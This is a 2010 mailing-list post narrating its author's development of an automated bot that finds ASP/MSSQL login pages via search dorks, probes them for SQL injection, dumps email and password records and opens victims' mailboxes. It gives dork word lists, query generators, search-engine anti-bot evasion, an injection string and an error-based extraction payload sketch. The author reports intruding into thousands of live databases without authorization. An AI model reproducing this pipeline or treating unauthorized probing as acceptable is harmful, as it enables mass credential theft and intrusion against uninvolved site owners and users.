Message-ID: <C26D0F02681C4545BB16A1819DA7DB3A@silence>
Date: Mon, 29 Mar 2010 20:28:06 +0200
From: "porkythepig" <porkythepig@...t.pl>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Raising Robot Criminals
"Raising Robot Criminals"
1. Intro.
/////////
Hi there.
I would like to share a few thoughts concerning my recent research into an
automated SQL injection "seek and penetrate" attack vector, focused on
identity theft and robot-driven attack propagation.
This "report" is a compilation of analysis of the runtime code's results
and some random thoughts and ideas written down during different parts of
the whole 2-year case study (all thanks to that advanced MS technology
called "Notepad")
While there have been dozens of white papers on the subject of web
application security as well as on SQL injection, this text is not yet
another one.
Instead, it's a short tale about an automated tool's development,
inspired somehow by the subsequently intriguing output data it produced,
data that actually made the code grow and mutate into different shapes.
The main objective was to build up the code and find out how far a fully
automated seek-and-penetrate web-app probing code could go without any
human supervision.
Moreover: to find out the possibilities of future mutations of the
attack vector's implementations.
I think everyone easily brings to mind one of the most famous recent
comparisons in computer security research: an intruder who trespasses on
somebody's property to tell the owner that his door locks are not good
enough.
Well, this project was, from the very beginning, not an attempt to discuss
that famous comparison's pros and cons.
Instead I decided to find out the ACTUAL NUMBERS behind the execution of
that particular attack vector in the wild.
The particular attack vector mutation chosen for implementation (but
definitely not the only one there to implement) was a combination of
several software and human-factor vulnerabilities:
- sensitive data extraction through SQL injection in web applications
driven by Microsoft SQL Server, exploiting ASP server-side script
vulnerabilities,
- insecure handling of personal secrets (by the owner),
- insecure storage of personal secrets (by the trustee),
- weak (or absent) anti-robot detection/protection in web search engines,
targeting malicious robot crawlers.
You should also understand that, for obvious reasons, certain details
concerning the compromised organizations, companies and government
institutions have been removed or reduced to a minimum in this publication.
Also, given the type of the project and the nature of the "output data", I
have decided NOT to publish any source code (at least at this moment).
But first, a bunch of probably well-known facts.
Eleven years ago, on Dec 25th 1998, the first official SQL injection paper
was published in Phrack magazine, in an article called "NT Web Technology
Vulnerabilities".
Since then the attack vector has become one of the favourite instruments
used by cyber criminals in internet-conducted data and identity theft.
The second fact: today's cyberized organizations and companies that web
users trust - that hold their personal data and sensitive unencrypted
secrets, "passwords" bound to home addresses, phone numbers and social
security numbers - are open to remote penetration.
The last fact is that ever since SQL command injection attacks began to
sweep the internet's infrastructure, security researchers and grey hats
out there, trying to point out and prove the existence of a security hole
that could open wide a particular company's database to possible user
identity theft, have had but three options:
1. Warn the system's owner and await prosecution for computer hacking.
2. Keep their mouths shut, waiting until a cracker does his job silently,
penetrating the system and trading stolen identity data to a 3rd party
and/or turning the company's system into a trojan infection spreading unit.
3. Do nothing and watch as some script kiddie eventually blows the database
up, resulting often in rapid and insufficient system patching, sometimes
even without knowing the heart of the issue.
Again: since a detailed public discussion about an actual organization's
cyber security (and their proprietary web applications, including app
links, penetration entrypoints, etc.) may generate much havoc - efforts
were made to limit to a minimum any details that could uncover direct
penetration entrypoints (i.e. links, interfaces) of the vulnerable
corporations' or government organizations' systems mentioned in this text.
The reason behind this form of security advisory is quite simple - since no
source code will be published for now, and additionally there shouldn't be
and won't be any vulnerable app links listed in the text as "script-kiddie
verifiable" examples - there are actually very few options left for how to
tell something about the actual research results.
Therefore, instead of a formal advisory - here it is - a short story about
the code and the research itself rather than its results.
Since I'm a programmer - no writer at all - please forgive my poor
English, style and most of all, my dyslexia :)
2. The Impulse.
///////////////
As a team of researchers once noted, a vulnerability dies when the number
of systems it can exploit shrinks to insignificance.
Based on that definition, one could say that after the recent 10+ years of
rich research and intensive exploitation, the SQL injection attack vector
is alive as hell.
The whole thing with the research and the bot writing began on some
early spring Sunday (as usual, somewhere between the 1st and 2nd coffee)
while I was poking around for clues about a cryptography-related problem
on SecurityFocus.
By complete accident I spotted a question from a totally different topic,
from a user who was eager to get some info about strange-looking log
entries that he had found on his Apache server.
He was intrigued by an entry containing part of a code-like payload
and wanted to know whether that logged event might have been some kind
of attack attempt. What dragged my attention was the answer, which
acknowledged his suspicions and identified the attack type as SQL
injection remote code execution...
Now, I must say here that since I was kind of "raised" on old-school
assembler and rather low-level code tweaking (C64 forever :) over
high-level language interoperability - I still don't know how, but I had,
strangely, kept a certain distance as a programmer from any topic
concerning SQL and relational databases.
Actually I had practically avoided SQL-related activities, either
professionally or in private projects. The obvious result was a certain
ignorance of the topic, reflected in an attraction to low-level security
issues like memory corruption and machine code reverse engineering.
Finally, I trivialized the severity of attack vectors aimed against
databases at every possible occasion.
Now, you see, I was a little bit confused following the SF user's post.
After reading one or two SQL injection white papers and numerous shouty
articles describing this attack vector's multiple commercial system
penetrations, I had this biggest question on my mind: isn't the DB
command injection threat something like 10 years well-researched now and
shouldn't it be a little bit, well uhhhmmmm .... dead?
Why would anyone seriously attempt this kind of attack these days if the
count of possible positive targets should be close to zero, after all the
time that has passed since it was first researched and through all these
years of intensive exploitation?
And what's the deal with remote code execution SQLi these days?
Not long after, I realized that being an ignorant also has its
good sides :)
Ironically, it seems that empirical ignorance may sometimes become
one-helluva-impulse for private research.
3. Sleepless.
/////////////
So I had this huge question on my mind - all I needed was to check whether
I was wrong and the malicious code injection mentioned in the SF user's
post was just one in a million - some last try of a 10-year-old, dying
rogue code, hopelessly knocking on today's secure database world :)
After going through about five "how to crack an SQL DB in less than a
minute" 4yr+ old tutorials I had all I needed: the algorithm for finding
a potential victim and probing it for penetrability.
Just as in the SF user's case, I decided to pick a PHP and MySQL based DB
for a start. And so I began the first "victim" hunt.
Asking Google for subsequent branch-types of companies, I was looking
for my first "accessible" remote DB table record somewhere out there.
And here it is! I've got it!
A sex wax shop...
Whatever.
A hack is a hack.
Just modifying the application's HTTP GET params manually, and here we go:
we've got on our screen, one by one, all the accessible shop's customer
details.
And about an hour earlier I had thought SQLi was a 10-year-old dead attack
vector :)
If a few minutes of manual googling produces arbitrary DB read access, I
guessed it was worth a try to check whether there was something more
"interesting" than an online sex wax shop.
After another day or two of sleepless HTTP GET params fuzzing and a bunch
of accessed private corp client DBs, varying from fashion agencies to hotel
booking systems, I decided to make friends with a different injection
attack vector approach: ASP.
My colleague's first observation was: "Hey, MSSQL has a really nice,
user-friendly cracking interface". Nicely formatted error message syntax,
followed by the elegantly served contents of a programmer- (or cracker-)
selected table record, and even a precise hex error code number! Well,
after all, the ASP server-side scripting technology is Microsoft's baby,
so as usual you get two in a pack of one.
The deal was actually quite simple: to locate a potential ASP SQLi attack
victim you needed to locate a vulnerable web application endpoint. To do
this you use URL target-filename pattern matching, utilizing any web
search engine. The app endpoint had, of course, to interact somehow with
the application's server-side database, so that we could inject our query
and have it executed. And which user-facing web application interface
suits this goal better than the password-based authentication interface :)
So here I was. The nightmare started.
Nothing more than a common script kiddie, sleeping sth like 3hrs a day, I
began to change into some kind of monstrous f***d up machine, typing
repeatedly, like a magic spell, one and the same sentence into the
browser, again and again, asking Google for subsequent matches against
different patterns describing possible system entrypoints.
4. Word play.
/////////////
Any programmer's job is first to imagine how the "thing" you want to bring
to life is going to work, and then comes the fun part - making up the
names - for your classes, methods, objects. In your code, everything has
to be named somehow, and you're a god here who gets to name it. In a
security researcher's case, however, it's quite the opposite - you need to
put yourself in the particular system programmer's place, imagining how it
could have been coded - when you do so, you may be able to pick the
places, by a file name pattern for example, where you would most probably
have made a mistake and left a security hole.
And of course the names... they are always the fun part.
After a day or two of brainless typing you finally begin to notice some
patterns in the word combinations you type and the results you get.
So the names were coming and going, one by one, right into Google's
search engine:
inurl:"Login.asp"
inurl:"CustomerLogon.asp"
inurl:"ClientLogon.asp"
inurl:"UserLogin.asp"+".gov"
inurl:"EmployeeLogin.asp"+".com"+"intranet"
...
System after system, inputting the same apostrophe-containing random
sequence into all the discovered FORM html fields, submitting, and
watching for any sign of a response page containing the familiar MSSQL
error code: 0x80040E14.
Funny that my finger-based "random generator" used for ASP "input fuzzing"
soon lost much of its randomness - after sth like a thousand manually typed
FORM input sequences it finally settled on: 'asd (one could say it
became more like a script-kiddie fingerprint :)
Obviously I did not focus so early on any specific SQLi mutation - take
Blind SQL Injection for one - nevertheless the goal remained the same
(i.e. to check which of the two is true: either the SQL injection attack
vector could in fact become a successful weapon in potential malicious
hands, or it's rather some old misty phrase nicely described in Wikipedia
and dead for a few years).
So the next few days seemed pretty much the same: brainless typing,
matching for errors, looking for subsequent targets, imagining any
possible attack propagation paths.
Somewhere at the beginning of the third day I found an entry into the
database of a bank... a SPERM bank, to be precise.
"A bank is a bank. And I've just cracked a bank."
I guess I was repeating that to myself for at least the next two days.
Anyway. When you notice you have begun to act like a machine, repeating
one keyboard-driven activity over and over - it is THE time. Finally, the
time to write some code has come. The code that will eventually relieve
you from your pitiful human-only drink/eat/rest limitations and make your
vengeance possible upon the evil entity that turned you into a machine for
the past week... :)
The first idea was to code a few simple search query generators based on
static word permutation lists and hook them up to Google using an HTTP
client. The case was all about shooting new words, grouping them into
semantic sections and building simple lingual generators that would feed
on the grouped word sections.
For example, the following two groups of words (taken directly from my
code's config file) are to be mixed together, creating different
permutations to build a final web search query:
Group0 = Logon
Group0 = Logon1
Group0 = Signon
Group0 = Signin
Group0 = Log_in
and
Group1 = Client
Group1 = User
Group1 = Master
Group1 = Admin
Group1 = Member
Group1 = Employee
Group1 = Customer
Group1 = Supplier
Using, for example, this query generator (actually it's the Bot's query
generator #1):
q1 = "inurl:" G0 || ".asp"
q2 = "inurl:" G0 || G1 || ".asp"
q3 = "inurl:" G1 || G0 || ".asp"
q4 = "inurl:" G1 || "/" || G0 || ".asp"
q5 = "inurl:" G1 || G0 || "/" || "default.asp"
We receive something like this:
inurl:"Logon.asp"
inurl:"ClientLogon.asp"
inurl:"LogonClient.asp"
inurl:"Client/Logon.asp"
inurl:"ClientLogon/default.asp"
inurl:"UserLogon.asp"
inurl:"LogonUser.asp"
... and so on.
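The permutation scheme above can be sketched in a few lines. This is a
minimal illustration in Python (not the original C++ source); the word
lists are the Group0/Group1 samples quoted above, and the q1..q5 patterns
follow the generator definition:

```python
# Sketch of the Bot's query generator #1: permute the config-file word
# groups into "inurl:" web search queries.

GROUP0 = ["Logon", "Logon1", "Signon", "Signin", "Log_in"]
GROUP1 = ["Client", "User", "Master", "Admin", "Member",
          "Employee", "Customer", "Supplier"]

def generator1(group0, group1):
    """Yield search queries following the q1..q5 patterns."""
    for g0 in group0:
        yield f'inurl:"{g0}.asp"'                   # q1
        for g1 in group1:
            yield f'inurl:"{g0}{g1}.asp"'           # q2
            yield f'inurl:"{g1}{g0}.asp"'           # q3
            yield f'inurl:"{g1}/{g0}.asp"'          # q4
            yield f'inurl:"{g1}{g0}/default.asp"'   # q5

queries = list(generator1(GROUP0, GROUP1))
# 5 Group0 words * (1 + 8 Group1 words * 4 patterns) = 165 queries
```

Even these two small word groups already produce a few hundred distinct
query strings - which is exactly why typing them by hand had to stop.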
The whole problem with search engines is that they provide only a very
small, limited part of the actual query results that their web crawler
robots were able to harvest in the first place. Asking the search engine
with those queries, we will receive at most 1000 hits (for Google), while
the number of matching results following that query pattern is sometimes
several thousand times bigger. Therefore we add, for example, second- and
third-level distinguishing groups, the first describing the target
company's branch and the second distinguishing between domain suffixes.
Group2 =
Group2 = voip
Group2 = remote
Group2 = banking
Group2 = airlines
Group2 = telecom
Group2 = software
Group2 = hosting
...
and
Group3 =
Group3 = com
Group3 = org
Group3 = net
Group3 = biz
Group3 = mil
Group3 = gov
Group3 = edu
...
Concatenating every query definition (in this example q1 to q4) with the
sequence nq = "+" || G2 || "+" || G3, as a result we get:
inurl:"ClientLogon.asp"
inurl:"ClientLogon.asp"+"com"
inurl:"ClientLogon.asp"+"voip"
inurl:"ClientLogon.asp"+"voip"+"com"
inurl:"ClientLogon.asp"+"voip"+"org"
inurl:"ClientLogon.asp"+"voip"+"net"
...
The algorithm for the query generators is actually quite simple: starting
with the most basic combinations, like:
inurl:"logon.asp"
inurl:"login.asp"
inurl:"login1.asp"
inurl:"signon.asp"
(combinations of words from just a single group), we expand the query with
different word groups at each new level, using a specific,
programmer-defined concatenation.
At the start we submit every generated query, store the results, and check
the result counter for each. If it is larger than the search engine's
result limit (let's say: 1000), we increase the generator level (to 2)
and, using the defined concatenation method for that level, we generate
subsequent queries with words from the next word group (i.e. G1). If the
predicted result count for some or all of the produced query strings is
again bigger than the search engine's limit -> we go for the 3rd-level
generator concatenation, and so on...
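A minimal sketch of that level-expansion loop. The `result_count` callback
here is an assumption standing in for the search engine's estimated hit
counter; nothing below is the original code:

```python
RESULT_LIMIT = 1000  # the most hits the engine will actually serve per query

def expand(query, levels, result_count):
    """Expand `query` with words from the next group whenever the engine's
    estimated hit count exceeds RESULT_LIMIT.
    `levels`: remaining word groups, e.g. [G1, G2, G3].
    `result_count`: assumed callback returning the estimated hit count."""
    if result_count(query) <= RESULT_LIMIT or not levels:
        return [query]                # narrow enough, or no groups left
    group, rest = levels[0], levels[1:]
    narrowed = []
    for word in group:
        # go one generator level deeper with each word of the next group
        narrowed += expand(query + '+"' + word + '"', rest, result_count)
    return narrowed
```

The effect: broad patterns like inurl:"logon.asp" fan out into thousands
of narrower queries, each of which fits under the engine's result cap.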
The same scheme applies to the password reminder services query generator:
Group9 = 1password
Group9 = 1pwd
Group9 = 1pass
Group9 = 1passwd
Group9 = 1pw
Group9 = 0login
Group9 = 0userid
...
and
Group10 = 1forgot
Group10 = 1forget
Group10 = 1forgotten
Group10 = 1lost
Group10 = 0find
Group10 = 0search
Group10 = 0email
Group10 = 1recovery
Group10 = 1recover
Group10 = 1retrieve
Group10 = 0get
Group10 = 1change
Group10 = 0new
Group10 = 1reset
Group10 = 1remind
...
Query Generator #2:
q1 = G9 || '.asp'
q2 = G10 || '.asp'
q3 = G9 || G10 || '.asp'
q4 = G10 || G9 || '.asp'
q5 = G9 || G10 || '/' || 'default.asp'
5. One toy story.
/////////////////
Programmatic automation of human behaviour, and watching the code as it
interacts with random human beings, is probably one of the coolest things
in bot programming.
Since this actually wasn't my first bot coding attempt, I decided to base
the code largely on one of my previous bot projects: an automated logic
decisioning code - a browser MMO auto-playing bot.
The previous code was a kind of "vendetta" against Ogame - an MMO browser
game addiction that brutally took :) almost 3 months of my life (anyway, a
different kind of story).
Three years after it was "brought to life" I decided to use its "guts",
i.e. the HTTP client and HTML parser (bound together to provide a simple
browser bot engine) and the basic AI API (which actually had to be rebuilt
almost from scratch in this case) to create a different type of robot code.
6. Robot vs. Anti-Robot.
////////////////////////
The first problem the new bot stumbled across was Google's anti-robot
protection. Aside from all the rest of the code that keeps the Google
engine alive and kicking, this code was built by them for two things:
1. To prevent the Google servers from being DDoS-killed by remote query
robot repeaters, like the ones being used within automated WWW-stats
software.
2. To recognize, signal and act against certain possibly malicious query
patterns - like, for example, automated web site infection software,
operating round the clock in search of new victims to embed malicious
scripts in (or to steal the data from).
The first version of the code executed without any delays between the
queries, or any other kind of logic built in to deal with Google's
anti-robot code (I simply didn't have a clue it existed in the first
place :) and ended up very quickly service-blocking my ISP's entire NAT
address space, successfully preventing it from using Google for ab. 3h.
The second launch locked the subnet for about half a day :)
So the very next thing done was building in a simple static 30s sleep()
between every page query HTTP request and disabling result-page jumping,
sticking to just a one-page-at-a-time incremental step. Constant delays of
course don't imitate a human too perfectly; however, the trick worked. At
least for some time...
About two weeks of the bot's runtime later I noticed that only the first
100 results out of a thousand per query were being dumped by the bot.
Analysing the issue, it came out that after the 10th result page, Google
displayed its good old "it seems like you're a malicious robot trying to
take control over the world" info and denied going further with the
selected query.
So... Did they implement a different robot recognition algorithm within
the past two weeks, or what?
No. I don't think so.
Changing the delay to a bigger randomized value (90+RND(20)) did the job.
For the next month the first segment of the Bot (i.e. the web search
engine hooked-up target-seeker) executed without any recognition.
Fooling Google's engine into thinking it was dealing with an actual human
worked. After a month, turning the query page change delay back to a
static 90s instantaneously resulted in the anti-robot service denial HTML
warning after requesting the 10th page. So the conclusion was: to bypass
the robot protection, the bot's thread should spend just enough CPU idle
cycles between every page increment to imitate human behaviour.
Further analysis showed that the Google search engine acts differently
for queries containing certain URL file name specifiers like ".asp" or
".php". The search queries recognized as asking for these file suffixes
simply required a longer minimal page change delay to successfully escape
being recognized as a "malicious robot". It was also noticed that the
Google bot-lock of an entire NAT area varies from 3 to ab. 32h.
Additionally, subsequent malicious-looking queries sent while in the
robot-lock state did not update the lock countdown timer.
The Google antibot code identifies the remote human/non-human entity by
IP, not by search session cookie. As a result, a single search from any
machine within a local subnet behind the NAT that SUBSEQUENTLY uses the
same search query pattern (like, for example, 'inurl:"forgotten.asp"')
will lead to the subnet's public IP being ID'd as hostile by Google's code.
Anyway, long story short: to fool Google's anti-bot protection we need
proper delays and human-like action randomization.
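As a sketch, the randomized page-change delay that finally kept the bot
unrecognized (the 90+RND(20) formula above) boils down to something like
this - the constants come from the text, everything else is illustration:

```python
import random
import time

BASE_DELAY = 90  # seconds; the static value alone got flagged after a month
JITTER = 20      # the randomized part that imitates human hesitation

def next_delay(rnd=random.random):
    """Return the randomized delay before requesting the next result page.
    `rnd` is injectable so the formula can be checked deterministically."""
    return BASE_DELAY + rnd() * JITTER

# between result-page increments the bot would simply do:
#   time.sleep(next_delay())
```

The point isn't the exact numbers - it's that a fixed interval is itself a
robot fingerprint, while a randomized one blends into human traffic.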
Building protection against the query auto-generating process employed by
robot software is not that difficult, and obviously more precise detection
of automated SQLi query syntax could be implemented by the web search
engine providers. After all, I guess it shouldn't be as easy as googling
your homework to search for an R/W-accessible sex wax shop customer
database and get all the clients' info on the screen, or to search for a
vulnerable US Department of Justice system like you would google for a
dinner recipe.
However, it should also be considered that wherever a detection schema for
malicious actions exists, there are usually numerous ways to get around
it. A fine detection algorithm shouldn't be taken as a "total cure" for
attacks using "robot-googling" as the victim search vector.
Ironically, while the bot got better and better at dealing with Google's
anti-robot recognition, I was recognized a few times by the very same
system as a machine (yepp), while typing search queries manually, using
just an old-school set of ten fingers :)
7. Bot's Development.
/////////////////////
There were two major code architecture changes throughout the whole
development time, so three different, subsequently more complex versions
of the bot were developed until it shaped into the final (or at least:
current) automated system.
Since the code was based mostly on the previous (MMO) bot's code, written
in C++, there wasn't actually much choice to be made about the programming
language. Although one must point out that C++ isn't the best choice if
you want to code a web-crawling automated bot - looking back from the
whole coding time's perspective, if I had the choice today and had to
write it from scratch, I would choose Python blindfolded (at least for
this kind of robot).
The very first version of the bot was a simple automated Google query
repeater, using static "target patterns" (i.e. ASP file name patterns to
search for, formed into a static input list). The static list of about 150
query-word combinations produced several thousand potential targets, which
were then probed by the pen-test algorithm: retrieve HTML contents ->
parse and search for FORMs -> feed every text-input field with an error
injection seq (i.e. 'having 1=1) -> parse the response for the MSSQL error
message pattern -> if matched: enumerate all vulnerable SQL query columns
-> log the target probing result (positive/negative).
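A rough sketch of that probing chain, reduced to pure string processing so
nothing here touches the network: `fetch` is an assumed callback returning
a page's HTML for a URL, and only the payload and error strings come from
the text above.

```python
import re

INJECTION_SEQ = "'having 1=1"   # the error-forcing input sequence
MSSQL_ERROR = "0x80040E14"      # the familiar MSSQL error code

def probe_target(url, fetch):
    """Return True (positive match) if feeding the injection sequence to a
    form found at `url` yields a response carrying the MSSQL error code."""
    html = fetch(url)
    # step 1: parse and search for FORMs (a crude regex stands in
    # for the bot's real HTML parser in this sketch)
    if not re.search(r"<form\b", html, re.IGNORECASE):
        return False
    # step 2: feed the text-input fields and resubmit
    # (modelled here as a second call to the fetch callback)
    response = fetch(url + "?input=" + INJECTION_SEQ)
    # step 3: parse the response for the MSSQL error message pattern
    return MSSQL_ERROR in response
```

The column enumeration and result logging steps are left out; the sketch
only shows the match/no-match decision the first bot version made.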
The SECOND version of the code was armed with more logic for "fooling"
Google's anti-robot protection and introduced "run levels" into the
probing section. The code segment performing the actual penetration of
positively-matched targets was given three run levels: vulnerability
matching / database structure enumeration (tables/columns/column types) /
automated record harvest for every (name-pattern-matched) email/password
column name combo. All the harvested EM/PW pairs were stored in the Bot's
internal database.
The third (current) version went multiprocess. The code was divided into 3
sections (later called 'segments') interoperating through the internal DB
and syncing through a named mutex. Two new major "toys" were also
introduced:
1. "Pattern Generators" (three for now), providing Segment-1 (the
penetration target seeker) with possible victim system URL patterns to use
with the Google-connected query repeater,
2. "Data Objective Patterns", configured from the config file, providing
quickly configurable regular-expression-based descriptions of what data
the Bot should look for within a penetrable remote database (i.e.
email/pwd combos, SSN/ID data, secret question/answer combos, credit card
numbers).
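A sketch of how such config-driven Data Objective Patterns might look. The
pattern names and regexes below are my own illustration, not the Bot's
actual config:

```python
import re

# each DOP: a list of regexes that must ALL be matched by some column name
DATA_OBJECTIVE_PATTERNS = {
    "EMLPW": [r"e[-_]?mail", r"pass(word|wd)?|pwd"],    # email/password combo
    "SSN":   [r"ssn|social"],                           # social security no.
    "CC":    [r"(credit[-_]?)?card[-_]?(no|num)"],      # credit card number
}

def match_dop(column_names):
    """Return the names of every DOP fully matched by a table's columns."""
    hits = []
    for name, patterns in DATA_OBJECTIVE_PATTERNS.items():
        if all(any(re.search(p, col, re.IGNORECASE) for col in column_names)
               for p in patterns):
            hits.append(name)
    return hits
```

The appeal of this design is that retargeting the bot to a new kind of
data means editing a config file, not recompiling the C++ code.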
The final (current) version's architecture and execution flow:
The system consists of 3 independent code sections - called simply
'segments' - that perform their specific objectives, interruptibly, in a
forever-loop. The segments are linked only by a logical chain of
input/output data - the result (output) data of one segment is the input
of the next. For example, Segment-2 will not go operational until it
receives enough input data, which is the automatically produced output of
Segment-1.
Segment-1 is an automated web search engine crawler driven by the 3 (so
far) basic word-phrase generators used to produce subsequent web search
queries. For now the segment is coded to operate on two web search
engines: google.com and search.com. It consists of 3 query pattern
generators that subsequently produce permutations of the selected query
pattern, utilizing a 400-word dictionary preconfigured specifically for
the project and divided into 9 functional groups. Every generated query is
then used to perform an automated search on each connected search engine,
and the results are stored as Segment-1's output. After the last query
pattern generator has produced its last permutation, Segment-1 stops.
Segment-2's objective is to process every potential target address
(HTTP/HTTPS link) that Segment-1 produced. It probes each system ONLY FOR
ONE PRECISE type of SQL injection vulnerability: an attack against buggy
ASP server-side code interconnected with MSSQL database systems. After a
positive match it builds a penetration entrypoint, enumerates all
databases accessible through the entrypoint and scans all the databases'
table structures for matches against the preconfigured Data Objective
Patterns. Finally, it "decides", using the DOP matching, which data will
be the target of the final penetration, and performs an automated data
harvest for every DOP matched, through all the databases' accessible
entrypoints. Then it stores the data, pre-analyses it and goes for the
next target supplied by S-1.
Segment-3 is driven by Segment-2's output data, pre-analyzed after every
successful penetration. Every data entry that matches the EMLPW Data
Objective Pattern (email/password: every table recognized to hold
email/password combo records) becomes its input. This segment has 2
operational modes. The first is a POP3-protocol / HTTP(S) webmail server
discovery tool. At first it tries to match an email server protocol and
location for every email/pw combo matched by Seg-2. After that, using the
recognized mail protocol, it performs password matching for the
corresponding email address. If the EmailAddress/Password pair matches, it
opens the mailbox using the recognized protocol, enumerates all the
messages and dumps every message containing one or more of the words:
"account", "login", "password", "confidential" or "classified". After
processing the last output entry from Segment-2, this segment stops.
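The three-segment chaining above can be reduced to a toy sketch. The real
bot synced its processes through an internal DB and a named mutex; here a
queue and stubbed segment bodies stand in for all of that:

```python
from queue import Queue

def segment1(out_q):
    """Target seeker: emit candidate URLs (stubbed with one example)."""
    out_q.put("http://example.test/ClientLogon.asp")
    out_q.put(None)                          # end-of-stream marker

def segment2(in_q, out_q, probe):
    """Prober: forward only positively matched targets downstream."""
    while (url := in_q.get()) is not None:
        if probe(url):
            out_q.put(url)
    out_q.put(None)

def segment3(in_q, harvested):
    """Harvest stage (mailbox matching in the real bot), stubbed."""
    while (target := in_q.get()) is not None:
        harvested.append(target)

# wire the chain: each segment feeds on the previous one's output
q12, q23, harvested = Queue(), Queue(), []
segment1(q12)
segment2(q12, q23, probe=lambda url: url.endswith(".asp"))
segment3(q23, harvested)
```

The key property survives even in the stub: a downstream segment has
nothing to do until its upstream neighbour has produced output.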
8. A school for a robot.
////////////////////////
Before any bot can leave its "master" and go by itself into the dangerous
human world, it obviously needs a proper education and training :)
Just like its predecessor - the MMO bot for Ogame, trained against
different human opponents on the game's different "universes" (servers),
trying to grow, evolve and develop its best-suited economic strategy
algorithm - the SQLi penetration bot also has to take its education
somewhere. Unfortunately there is one big difference between a game bot
and a search-and-probe bot like this one: while Ogame's client-server game
protocol (HTTP-based) could be reversed and described as a static sequence
of URLs (links) for the AI "puppet master" to use, the penetration bot
needs to deal with a different system every time - so it takes a lot more
"training" for the second type of bot to reach the highest probability
that the code will recognize a vulnerability if it exists, and match the
target as "negative" if it doesn't, for EVERY pen-tested system.
Keeping the false-negative count as low as possible is a key factor in
this kind of bot. Ironically, it seems that the opposite situation may
also occur (which I'll try to describe later) - the human-trained robot
could find a vulnerability in a way that the human didn't even know about,
actually, to be able to train it :)
The first bot's penetration automation was developed by training it
against a vulnerable web database system (found earlier manually)
belonging to an international security training company (right, the irony
is sometimes unbearable...) providing private investigation / intelligence
solutions. The development took just as long as it took for the bot to be
able to perform successfully, i.e. to exit having retrieved all the
targeted data (personal information, login/email/password data records),
with no human supervision. The first version of the Bot performed ab. 100
subsequent penetrations of that system until it was able to do so, while I
was trying to patch the bot's logic flaws and to make the injection query
syntax used simpler and more effective.
Although every time the code harvested the very same data (later
configurable as Data Objective Patterns in the bot's second version) -
subsequently aiming at data within tables holding logins, emails and
passwords of employees - the process had to be repeated, as no code ever
runs bug-free right after the first compilation. (BTW: if any of your
'release' code ever does so - according to the laws of probability - you
really should be worried :)
These subsequent coding/recompilation/execution steps, forcing the code to
obtain exactly the same results as a human did before, make the code grow
and learn in order to become a robot. But it is up to the human (the
programmer) to decide who will be waiting at the end of the "teaching
line" - a malicious "robot criminal" or a vulnerability assessment and
response framework.
There is also one big question of morality left unanswered.
Why the hell use an unaware live target for an exercise, becoming a
criminal with every single enter you press, while you could build your own
local vulnerable application server, or even download a virtualized one
within a few minutes, preconfigured and pentest-ready?
The question is good.
The answer is tough (if there is any).
At the beginning of the research I was a total SQL newbie (as a
programmer). One of my first goals was to change that - combining the
pleasant with the useful. And it's quite obvious that without proper
theoretical preparation, a tutorial-only-based crack-and-destroy learning
approach doesn't make a researcher of any kind - it makes a script kiddie.
Finding the differences between several live vulnerable systems and
matching them against each other to find all the common factors that
render them vulnerable is a far more effective way of teaching the
automated vulnerability detection system (and me) than a study approach
based on a single, often naive, example, which is usually already too old
to make a realistic model.
While I was learning SQL language syntax - the bot was "learning" SQL
Injection attack vector. For that, I guess every security researcher is a
sinner somewhere there, wandering on his "split guilt" mindfields, leaving
the final "enter key-press" decision to a human robot-code operator.
9. Randomized target penetration.
/////////////////////////////////
The penetration target - a particular company's or organization's system
- is not selected by a human here.
The code, employing a randomized target pattern matching algorithm,
"selects" it for you.
Obviously, saying "I didn't commit a crime probing the system for the
vuln, the code did it" is somewhat childish, isn't it?
In the hands of a criminal, any kind of pentesting tool will always be
programmed and used for malicious activities, regardless of its automated
or manually oriented operation architecture.
Everything depends on the programmer's intentions - if they were
malicious, the code's behavior should also be expected to be malicious.
In practice, code that automates some more complex problem-solving
process is in fact a kind of snapshot of the strategic planning algorithm
in the programmer's mind, whether it is an automated MMORPG
tactics-decisioning bot or a security vulnerability seek-and-penetrate
system.
Therefore, it would be nice to see some day that automated tools seeking
out vulnerable information systems across a specific country, industry
branch or worldwide are, in turn, operational and running under the
control of the people whose job is to protect us from cyber criminals and
enemy cyberwarfare (for example, every country's national CSIRT/CERT
units).
At this moment it is not possible for whitehat "samaritans" out there to
perform remote system penetration testing without prior formal
authorization from the system's owners - no matter how good their
intentions and how detailed the pentest report - they are considered
criminals from the very first Enter key pressed.
As long as a particular public web app / web portal vulnerability exists,
it poses a serious threat to any internet user who, unaware of the risks
of digital system compromise, trusted the system's creators and let them
process his private ID data along with the most sensitive data of all:
secrets and passwords, often universal ones. Once the system is
compromised, an attacker exploiting universal passwords can proceed to
compromise the person's digital security itself.
10. Primary Impact analysis.
////////////////////////////
After the bot's final version was launched, it ran uninterrupted (not
counting a few blackouts during lightning storms in my village) for about
a month. From the list of 200K+ web system addresses produced by
Segment-1, it probed exactly 28944 systems for possible penetration entry
points. It matched exactly 2601 database servers as "positive" against
the ASP/MSSQL Injection attack, and tested them for possible penetration
depth, enumerating every fully accessible (read/write) database on each
system using the particular entry point DB user's access level.
Over the month-long test run, exactly 6557 databases on those 2601 DB
servers were matched by the bot as fully accessible using the ASP-based
attack vector.
The already known and widely recognized impact of the common SQL
Injection attack falls into a few categories:
a) sensitive information disclosure,
b) loss of data integrity,
c) database server remote code execution and further network penetration.
Putting the impact analysis aside for a moment, I'd like to mention an
accurate observation by a colleague of mine. One of my programmer
friends, not related to the security industry, once saw an MSSQL server
compromise in progress and called it "an API for database cracking". It
was, after all, a very apt comparison.
The default SQL Server error reporting configuration, physically one of
the engines behind the "popularity" of ASP-based command injection,
equips an attacker with an easily parser-traceable 32-bit error code,
strict syntax and a single-block error message containing, enclosed in
apostrophes, the particular data record requested by the attacker - a
heaven for parser writers - the extracted data is prepared and served by
the server's error reporting engine like dinner in a good restaurant. The
only thing the attacker has to do in order to watch the selected column's
value in his web browser window is to force the server-side ASP
application to cause an SQL data type mismatch run-time error (a
numeric/character type mismatch error, to be precise).
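The mechanics described above can be sketched in a few lines. This is my
illustration only, not the bot's actual code: the payload shape, the
regex and the table/column names are assumptions based on the classic
error-based MSSQL extraction technique.

```python
import re

# Forcing a character value into an integer context makes the server's
# error message itself leak the requested record:
def build_payload(column, table):
    # Injected into a numeric parameter of a vulnerable ASP page.
    return ("' AND 1=CONVERT(int,(SELECT TOP 1 %s FROM %s))--"
            % (column, table))

# The single-block error message encloses the leaked value in
# apostrophes, which makes it trivial to pull out with a regex:
ERROR_RE = re.compile(
    r"Syntax error converting the \w+ value '([^']*)' "
    r"to a column of data type int")

def extract_value(error_page):
    m = ERROR_RE.search(error_page)
    return m.group(1) if m else None
```

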